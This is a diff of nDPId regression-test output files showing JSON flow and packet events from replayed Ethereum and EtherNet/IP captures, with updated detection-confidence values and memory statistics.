+00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":35,"flow_first_seen":1578508364659,"flow_last_seen":1578508365043,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":431,"flow_tot_l4_payload_len":1158,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"40.67.144.128","src_port":56630,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
+00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":42,"flow_first_seen":1578508364523,"flow_last_seen":1578508365511,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":525,"flow_tot_l4_payload_len":1280,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"52.187.207.27","src_port":56621,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00803{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1578508365828,"flow_last_seen":1578508366083,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":404,"flow_tot_l4_payload_len":404,"flow_avg_l4_payload_len":101,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"13.251.14.199","src_port":56678,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
+00805{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1578508364382,"flow_last_seen":1578508364650,"flow_idle_time":200000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":1057,"flow_tot_l4_payload_len":1653,"flow_avg_l4_payload_len":551,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"18.138.108.67","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1578508365751,"flow_last_seen":1578508365853,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":530,"flow_tot_l4_payload_len":1396,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.235.37.216","src_port":56675,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
+00802{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1578508366005,"flow_last_seen":1578508366135,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":561,"flow_tot_l4_payload_len":1439,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"51.83.237.44","src_port":56684,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00802{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1578508364422,"flow_last_seen":1578508365065,"flow_idle_time":200000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":448,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"66.42.82.246","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
+00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"finished","flow_packets_processed":48,"flow_first_seen":1578508365592,"flow_last_seen":1578508365773,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":540,"flow_tot_l4_payload_len":1832,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"86.107.243.62","src_port":56671,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00803{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1578508366020,"flow_last_seen":1578508366101,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":580,"flow_tot_l4_payload_len":1153,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"88.99.93.219","src_port":56685,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
+00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1578508364522,"flow_last_seen":1578508365036,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":458,"flow_tot_l4_payload_len":1241,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"162.243.160.83","src_port":56613,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1578508365009,"flow_last_seen":1578508365126,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":540,"flow_tot_l4_payload_len":1312,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"144.91.120.135","src_port":56641,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
+00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":44,"flow_first_seen":1578508364824,"flow_last_seen":1578508365152,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":571,"flow_tot_l4_payload_len":1388,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"159.203.84.31","src_port":56634,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00568{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","packets-captured":2000,"packets-processed":2000,"total-skipped-flows":0,"total-l4-payload-len":86968,"total-not-detected-flows":0,"total-guessed-flows":3,"total-detected-flows":71,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":74,"total-idle-flows":74,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":432,"global_ts_msec":1578508366135} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 2000/2000 
@@ -438,9 +438,9 @@ ~~ total active/idle flows...: 74/74 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 6013087 bytes -~~ total memory freed........: 6013087 bytes -~~ total allocations/frees...: 120410/120410 +~~ total memory allocated....: 6146721 bytes +~~ total memory freed........: 6146721 bytes +~~ total allocations/frees...: 123172/123172 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 459 chars ~~ json string max len.......: 1985 chars diff --git a/test/results/ethernetIP.pcap.out b/test/results/ethernetIP.pcap.out index 3d3f3eb2f..d8373b9b1 100644 --- a/test/results/ethernetIP.pcap.out +++ b/test/results/ethernetIP.pcap.out 
@@ -2,28 +2,28 @@ 00550{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"ethernetIP.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1352718180263} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1352718180263,"flow_last_seen":1352718180263,"flow_idle_time":7580000,"flow_min_l4_payload_len":82,"flow_max_l4_payload_len":82,"flow_tot_l4_payload_len":82,"flow_avg_l4_payload_len":82,"midstream":1,"thread_ts_msec":1352718180263,"l3_proto":"ip4","src_ip":"141.81.0.10","dst_ip":"141.81.0.83","src_port":50275,"dst_port":44818,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00566{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1352718180263,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":136,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":136,"pkt_l4_len":102,"thread_ts_msec":1352718180263,"pkt":"AAC80WDaeOfR4AJeCABFAAB6cCZAAIAGAACNUQAKjVEAU8RjrxLdiI2HlJVDUVAY+XQbbAAAcAA6AAABAhAAAAAAGjkvAAAAAAAAAAAAAAAAAAoAAgChAAQACRM1ALEAJgDkagoCIAIkAQIABgASAEwCIHIkAADOBAABAEwCIHIkACw9BAABAA=="} 
-00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1352718180263,"flow_last_seen":1352718180263,"flow_idle_time":7580000,"flow_min_l4_payload_len":82,"flow_max_l4_payload_len":82,"flow_tot_l4_payload_len":82,"flow_avg_l4_payload_len":82,"midstream":1,"thread_ts_msec":1352718180263,"l3_proto":"ip4","src_ip":"141.81.0.10","dst_ip":"141.81.0.83","src_port":50275,"dst_port":44818,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"EthernetIP","breed":"Acceptable","category":"Network"}} +00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1352718180263,"flow_last_seen":1352718180263,"flow_idle_time":7580000,"flow_min_l4_payload_len":82,"flow_max_l4_payload_len":82,"flow_tot_l4_payload_len":82,"flow_avg_l4_payload_len":82,"midstream":1,"thread_ts_msec":1352718180263,"l3_proto":"ip4","src_ip":"141.81.0.10","dst_ip":"141.81.0.83","src_port":50275,"dst_port":44818,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"EthernetIP","breed":"Acceptable","category":"Network"}} 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1352718180264,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1352718180264,"pkt":"eOfR4AJeAAC80WDaCABFAAAowW9AAEAGXmGNUQBTjVEACq8SxGOUlUNR3YiN2VAQD8bOTwAAAAAAAI1R"} 
02070{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1352718180264,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1258,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1258,"pkt_l4_len":1224,"thread_ts_msec":1352718180264,"pkt":"AAC80WDaeOfR4AJeCABFAATccChAAIAGAACNUQAKjVEAU8RjrxLdiI3ZlJVDUVAY+XQfzgAAcAAsAAABAhAAAAAAGzkvAAAAAAAAAAAAAAAAAAoAAgChAAQAChU1ALEAGACvuAoCIAIkAQEABABMAiByJAAEggYAAQBwADoAAAECEAAAAAAcOS8AAAAAAAAAAAAAAAAACgACAKEABAAFCzUAsQAmAHuyCgIgAiQBAgAGABIATAIgciQAGLcEAAEATAIgciQAvFQGAAEAcAAsAAABAhAAAAAAHTkvAAAAAAAAAAAAAAAAAAoAAgChAAQABg01ALEAGAAHpAoCIAIkAQEABABMAiByJAAEggYAAQBwAKoAAAECEAAAAAAeOS8AAAAAAAAAAAAAAAAACgACAKEABAABAzUAsQCWABkzCgIgAiQBCgAWACIALgA6AEYAUgBeAGoAdgCCAEwCIHIkAHR\/BwABAEwCIHIkANiMBAABAEwCIHIkAITEBAABAEwCIHIkAAznBQABAEwCIHIkABh0BwABAEwCIHIkADS+BgABAEwCIHIkABDjBAABAEwCIHIkADQ\/BgABAEwCIHIkADS8BQABAEwCIHIkADTGBgABAHAA4gAAAQIQAAAAAB85LwAAAAAAAAAAAAAAAAAKAAIAoQAEAAIFNQCxAM4AoxkKAiACJAEOAB4AKgA2AEIATgBaAGYAcgB+AIoAlgCiAK4AugBMAiByJACUpgQAAQBMAiByJABAoQYAAQBMAiByJADc\/QUAAQBMAiByJAD0hgUABgBMAiByJAAs5QUAAQBMAiByJACYFAcAAQBMAiByJACkkwYAAQBMAiByJABstwQABABMAiByJAA8cgQAAQBMAiByJAC8oAQAAQBMAiByJABQpQUAAQBMAiByJABY4wQAAQBMAiByJAC4xwcAAwBMAiByJAC0zwQAAQBwACwAAAECEAAAAAAgOS8AAAAAAAAAAAAAAAAACgACAKEABAADBzUAsQAYAHenCgIgAiQBAQAEAEwCIHIkAGiiBwAJAHAAwgEAAQIQAAAAACE5LwAAAAAAAAAAAAAAAAAKAAIAoQAEAAQJNQCxAK4Bf58KAiACJAEeAD4ASgBWAGIAbgB6AIYAkgCeAKoAtgDCAM4A2gDmAPIA\/gAKARYBIgEuAToBRgFSAV4BagF2AYIBjgGaAUwCIHIkAIx0BwABAEwCIHIkAKiiBwABAEwCIHIkAJg0BAABAEwCIHIkADgxBwABAEwCIHIkAChvBgABAEwCIHIkACiNBgABAEwCIHIkAAgQBgABAEwCIHIkANRpBwABAEwCIHIkAEB1BgABAEwCIHIkAPQcBgABAEwCIHIkAOwZBgABAEwCIHIkAIizBwABAEwCIHIkAOQgBgABAEwCIHIkAMgaBgABAEwCIHIkAGQ5BwABAEwCIHIkADi\/BgABAEwCIHIkACivBQABAEwCIHIkABwhBgABAEwCIHIkAEj1BQABAEwCIHIkAFT1BgABAEwCIHIkAAA8BgABAEwCIHIkAMRfBwABAEwCIHIkALCqBQABAEwCIHIkAKC1BgABAEwCIHIkAMT8BwABAEwCIHIkAMB0
BgABAEwCIHIkAEzoBwABAEwCIHIkAGguBAABAEwCIHIkAHyvBQABAEwCIHIkALwJBgABAA=="} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1352718180265,"flow_last_seen":1352718180265,"flow_idle_time":7580000,"flow_min_l4_payload_len":72,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":72,"midstream":1,"thread_ts_msec":1352718180265,"l3_proto":"ip4","src_ip":"141.81.0.63","dst_ip":"141.81.0.10","src_port":44818,"dst_port":52593,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00550{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1352718180265,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":92,"thread_ts_msec":1352718180265,"pkt":"eOfR4AJeAAC8x85WCABFAABwk1RAAEAGjEiNUQA\/jVEACq8SzXF9dCfmE+ef0VAYEACJaQAAcAAwAAAFAhMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgChAAQAncYAgLEAHAAzNYoAAAACAAYADgDMAAAAAQAAAMwAAAAFAAAA"} -00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1352718180265,"flow_last_seen":1352718180265,"flow_idle_time":7580000,"flow_min_l4_payload_len":72,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":72,"midstream":1,"thread_ts_msec":1352718180265,"l3_proto":"ip4","src_ip":"141.81.0.63","dst_ip":"141.81.0.10","src_port":44818,"dst_port":52593,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"EthernetIP","breed":"Acceptable","category":"Network"}} 
+00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1352718180265,"flow_last_seen":1352718180265,"flow_idle_time":7580000,"flow_min_l4_payload_len":72,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":72,"midstream":1,"thread_ts_msec":1352718180265,"l3_proto":"ip4","src_ip":"141.81.0.63","dst_ip":"141.81.0.10","src_port":44818,"dst_port":52593,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"EthernetIP","breed":"Acceptable","category":"Network"}} 00900{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1352718180265,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":386,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":386,"pkt_l4_len":352,"thread_ts_msec":1352718180265,"pkt":"AAC8x85WeOfR4AJeCABFAAF0cCpAAIAGAACNUQAKjVEAP81xrxIT55\/RfXQoLlAY9kIcUgAAcAA6AAAFAhMAAAAAZsC+AAAAAAAAAAAAAAAAAAoAAgChAAQABy8uALEAJgDoRwoCIAIkAQIABgASAEwCIHIkABi3BAABAEwCIHIkADxUBgABAHAA4gAABQITAAAAAGfAvgAAAAAAAAAAAAAAAAAKAAIAoQAEAAMnLgCxAM4AUkkKAiACJAEOAB4AKgA2AEIATgBaAGYAcgB+AIoAlgCiAK4AugBMAiByJACUpgQAAQBMAiByJABEoQYAAQBMAiByJABc\/QUAAQBMAiByJAB0hgUABgBMAiByJACs5AUAAQBMAiByJACcFAcAAQBMAiByJACokwYAAQBMAiByJABstwQABABMAiByJAA8cgQAAQBMAiByJAC8oAQAAQBMAiByJADQpAUAAQBMAiByJABY4wQAAQBMAiByJAC8xwcAAwBMAiByJAC0zwQAAQA="} 
00550{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1352718180276,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":92,"thread_ts_msec":1352718180276,"pkt":"eOfR4AJeAAC8x85WCABFAABwk1ZAAEAGjEaNUQA\/jVEACq8SzXF9dCguE+ehHVAYEADbwgAAcAAwAAAFAhMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgChAAQAlcYAgLEAHADoR4oAAAACAAYADgDMAAAAAAAAAMwAAAAFAAAA"} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":33,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1352718180390,"flow_last_seen":1352718180390,"flow_idle_time":7580000,"flow_min_l4_payload_len":194,"flow_max_l4_payload_len":194,"flow_tot_l4_payload_len":194,"flow_avg_l4_payload_len":194,"midstream":1,"thread_ts_msec":1352718180390,"l3_proto":"ip4","src_ip":"141.81.0.10","dst_ip":"141.81.0.43","src_port":52594,"dst_port":44818,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00715{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1352718180390,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":248,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":248,"pkt_l4_len":214,"thread_ts_msec":1352718180390,"pkt":"AAC8X0j6eOfR4AJeCABFAADqcEVAAIAGAACNUQAKjVEAK81yrxIurdArV0tI1VAY+M4btAAAcACqAAAEAhAAAAAAVgG6AAAAAAAAAAAAAAAAAAoAAgChAAQAASuWALEAlgBI5QoCIAIkAQoAFgAiAC4AOgBGAFIAXgBqAHYAggBMAiByJABI8gcAAQBMAiByJAAY8QQAAQBMAiByJABUPgUAAQBMAiByJAB42QcAAQBMAiByJAC8YQYAAQBMAiByJAAgzgQAAQBMAiByJAC8LgUAAQBMAiByJACcBgQAAQBMAiByJACwAQYAAQBMAiByJAD8DwQAAQA="} 
-00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":33,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1352718180390,"flow_last_seen":1352718180390,"flow_idle_time":7580000,"flow_min_l4_payload_len":194,"flow_max_l4_payload_len":194,"flow_tot_l4_payload_len":194,"flow_avg_l4_payload_len":194,"midstream":1,"thread_ts_msec":1352718180390,"l3_proto":"ip4","src_ip":"141.81.0.10","dst_ip":"141.81.0.43","src_port":52594,"dst_port":44818,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"EthernetIP","breed":"Acceptable","category":"Network"}} +00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":33,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1352718180390,"flow_last_seen":1352718180390,"flow_idle_time":7580000,"flow_min_l4_payload_len":194,"flow_max_l4_payload_len":194,"flow_tot_l4_payload_len":194,"flow_avg_l4_payload_len":194,"midstream":1,"thread_ts_msec":1352718180390,"l3_proto":"ip4","src_ip":"141.81.0.10","dst_ip":"141.81.0.43","src_port":52594,"dst_port":44818,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"EthernetIP","breed":"Acceptable","category":"Network"}} 00660{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1352718180392,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1352718180392,"pkt":"eOfR4AJeAAC8X0j6CABFAADAqJJAAEAGds6NUQArjVEACq8SzXJXS0jVLq3Q7VAYEAA2UAAAcACAAAAEAhAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgChAAQApcYAgLEAbABI5YoAAAAKABYAHgAmAC4ANgA+AEYATgBWAF4AzAAAAGC0GD\/MAAAAM1O1QswAAAC1P4xBzAAAAAAAAADMAAAAYLQYP8wAAAAAAKBAzAAAAAAAAEDMAAAAAAAAAMwAAAAAAAAAzAAAAAAAAAA="} 
01087{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":35,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1352718180392,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":528,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":528,"pkt_l4_len":494,"thread_ts_msec":1352718180392,"pkt":"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"} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":37,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1352718180397,"flow_last_seen":1352718180397,"flow_idle_time":7580000,"flow_min_l4_payload_len":194,"flow_max_l4_payload_len":194,"flow_tot_l4_payload_len":194,"flow_avg_l4_payload_len":194,"midstream":1,"thread_ts_msec":1352718180397,"l3_proto":"ip4","src_ip":"141.81.0.10","dst_ip":"141.81.0.23","src_port":62717,"dst_port":44818,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 